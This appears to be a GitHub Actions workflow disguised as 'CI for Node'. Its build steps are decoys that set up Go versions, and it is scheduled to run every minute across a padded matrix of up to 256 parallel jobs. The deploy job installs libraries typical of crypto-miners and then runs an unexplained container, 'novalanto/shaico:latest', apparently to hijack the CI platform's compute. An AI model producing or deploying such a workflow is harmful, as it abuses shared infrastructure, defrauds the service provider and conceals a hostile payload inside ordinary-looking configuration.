name: CI for Node 
on:
  push:
  schedule:
    - cron: '*/1 * * * *'  
jobs: 
  build: 
    name: build 
    runs-on: ubuntu-latest
    strategy: 
      max-parallel: 256
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4, 1.5] 
        flag: [A, B, C, D] 
    env: 
        NUM_JOBS: 256
        JOB: ${{ matrix.go }} 
    steps: 
    - name: set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
  deploy: 
    name: deploy 
    needs: build 
    runs-on: ubuntu-latest
    strategy: 
      max-parallel: 256
      fail-fast: false 
      matrix: 
        go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21]
        flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, a1a, a2a, a3a, a4a, a5a, b1b, b2b]
    env: 
        NUM_JOBS: 256
        JOB: ${{ matrix.go }}
    steps: 
    - name: set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go
    - name : install dependencies 
      run: sudo apt-get update && sudo apt-get install -y ca-certificates wget git libcurl4 libjansson4 libgomp1 curl sudo docker.io
    - name: build  
      run: docker run novalanto/shaico:latest
